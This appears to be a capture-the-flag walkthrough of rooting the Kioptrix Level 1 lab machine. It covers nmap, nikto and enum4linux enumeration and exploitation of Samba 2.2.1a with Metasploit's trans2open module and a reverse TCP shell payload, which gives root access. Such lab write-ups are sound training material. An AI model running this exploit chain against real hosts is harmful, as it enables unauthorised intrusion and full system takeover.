So today we will be doing the first machine of the Kioptrix series which can be found on vulnhub. The challange says “EMail” so I guess the flag is in the email of one of the user accounts.

So to start of we run the netdiscover -r 192.168.0.0/24 command to find the machine on the local area network. But it doesn’t show anything, yet again. So I googled and came up with host discovery for nmap nmap -sn 192.168.0.0/24. Seems to work good and fine so we will use this for any new machines, since netdiscover always takes a while and its a gamble if a machine shows up or not. The machine should be at the .131 address since we are .129 ourself.

So lets run a normal and a all port nmap scan with the following two commands: nmap -sV -sC -vv 192.168.0.131 -oA nmap and nmap -sV -sC -p- 192.168.0.131 -oA nmap full. We use verbose on the first nmap scan so we can start any new enumeration techniques while the nmap scan is still running.

We see port 80 is open, lets run a nikto and dirb scan on it while nmap is still running. We used the following two commands: nikto -host http://192.168.0.131 -output nikto.txt and dirb http://192.168.0.131 -o dirb.txt .

While these are running we can have a look at the nmap results, nmap should be done.

# Nmap 7.80 scan initiated Thu Feb  6 06:38:32 2020 as: nmap -sV -sC -vv -oA nmap 192.168.0.131
Nmap scan report for 192.168.0.131
Host is up, received syn-ack (0.0013s latency).
Scanned at 2020-02-06 06:38:32 EST for 125s
Not shown: 994 closed ports
Reason: 994 conn-refused
PORT     STATE SERVICE     REASON  VERSION
22/tcp   open  ssh         syn-ack OpenSSH 2.9p2 (protocol 1.99)
--snip--
80/tcp   open  http        syn-ack Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
| http-methods: 
|   Supported Methods: GET HEAD OPTIONS TRACE
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
111/tcp  open  rpcbind     syn-ack 2 (RPC #100000)
139/tcp  open  netbios-ssn syn-ack Samba smbd (workgroup: TAMYGROUP)
443/tcp  open  ssl/https   syn-ack Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
--snip--
1024/tcp open  status      syn-ack 1 (RPC #100024)

Host script results:
|_clock-skew: 1h01m48s
| nbstat: NetBIOS name: KIOPTRIX, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
|   KIOPTRIX<00>         Flags: <unique><active>
|   KIOPTRIX<03>         Flags: <unique><active>
|   KIOPTRIX<20>         Flags: <unique><active>
|   \x01\x02__MSBROWSE__\x02<01>  Flags: <group><active>
|   MYGROUP<00>          Flags: <group><active>
|   MYGROUP<1d>          Flags: <unique><active>
|   MYGROUP<1e>          Flags: <group><active>
--snip--

Our full port scan didn’t found any extra services. We got a couple ports we can look at. 80, 111, 139, 443 and 1024. Seems like we have to either exploit port 139 netbios or the webserver on 80 or 443. Lets have a look at port 111 since I’m still curious where this port is normally used for. Doesn’t seem like we can do anything with it again. Should really look into the service later on.

The nikto and dirb scan are done, lets have a look at the results:

Seems like it gave us quite some false positives. Like the files //etc/hosts and the wordpress files and possible backdoor are not found on the servers. The /manual/ and /usage/ does exist. The usage page seems interesting to exploit:

While looking around the /test.php file is also listed. But it isn’t interesting it only shows the following, probable php4 is used but it doesn’t print the text. So it might aswell not be php4 since it isn’t printing the contents.

<?php4
	print "TEST";
?>

At the bottom of the webpage we can find the following: Generated by Webalizer Version 2.01. Is there any exploits for this versions? Lets use searchsploit with the following command searchsploit webalizer. Doesnt seem like there is any.

While using the web I found https://www.cvedetails.com/cve/CVE-2002-0180/ seems like there is a vulnerability with code execution. But no exploit code available in searchsploit so it might be a tough one to exploit.

On to the next port, 139. I’m trying to enumerate the SMB service on port 139 but I’m having some problems. Enum4linux gave me a couple usernames but stopped running after a small bit. Lets save the user names to a txt file and then we can have a look at metasploit, which I normally don’t use but need to learn anyway.

Lets keep it simple, we can format the usernames later if we need it. Lets echo it to a txt file with the following command: echo "administrator, guest, krbtgt, domain admins, root, bin, none" > kioptrix/usernames.txt

Lets start up metasploit with msfconsole and use the search smb command to see what we can do. At the bottom we see a bunch of exploits but not much I want to do with that yet.If we scroll up we can see a bunch of scanners:

Lets use a couple of these to see what we can find. Below are some results. You can just copy the path and then use the use command with the path after it. Like use auxiliary/scanner/smb/smb_version. Then we can do show options to see the settings we have to set. We have to set the RHOST value which can be done with the set command. set RHOST 192.168.0.131. Then we can use the run command to run it.

Seems like it is running Samba 2.2.1a. Is there any exploits for it. Lets run searchsploit again and we found some interesting exploits. Since we are using metasploit already lets try to find the one listed in there.

So the first exploit trans2open is for OSX, The system is running redheat from what the apache mainpage said. So that is not it. The second exploit nttrans says in metasploit that is it a DOS (Denial of Service) which is not what we want.

The third exploit trans2open seems interesting, which is available for multiple versions.

Let use the number 1 for Linux, check the options like we did before and set the RHOST and then run.

Seems like the meterpreter session works but it dies instantly:

Maybe we have to use another payload? Lets see what the exploit is using at the moment. We can see all the advanced options with show advanced options. It is running a meterpreter reverse tcp payload.

With the show payloads command we can see all the available payloads. Lets use a normal reverse_tcp payload.

The use payload command in the screenshot above is wrong, we had to use set payload linux/x86/shell/reverse_tcp. Lets check the options again, all good? I changed the Lport to 8080 and lets run it.

Looks like we got root access! But now we have to find the flag in an email or something? Lets look around for a bit if we can not find anything, lets google 😉

So I checked in the home directories, in the root directory and could not find it, so I googled and emails are under /var/spool/mail. I catted the emails from the three users harold, john and root. And in root I found:

We completed the challange, on to level 2 in the Kioptrix series.

One Comment

Leave a Reply

Your email address will not be published. Required fields are marked *